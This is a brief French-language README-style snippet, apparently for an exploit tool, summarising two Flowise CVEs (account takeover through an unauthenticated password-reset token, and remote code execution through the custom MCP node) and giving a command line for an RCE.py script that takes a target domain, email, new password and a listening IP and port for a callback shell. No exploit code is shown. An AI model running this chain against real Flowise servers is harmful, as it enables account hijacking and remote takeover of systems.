
CVE-2025-58434 Flowise <= 3.0.5 et versions antérieures permet la prise de contrôle de compte via un jeton de réinitialisation de mot de passe non authentifié. CVE-2025-59528 lowiseAI Custom MCP Node Remote Code Execution.
CVE-2025-58434 Flowise <= 3.0.5 et versions antérieures permet le détournement de compte via un jeton de mot de passe oublié non authentifié. CVE-2025-59528 Exécution de code à distance via le nœud MCP personnalisé de flowiseAI.
python3 RCE.py -d "example.com" -e "[email protected]" -np "Password@a123" -lh <IP_addr> -lp <Listening_port>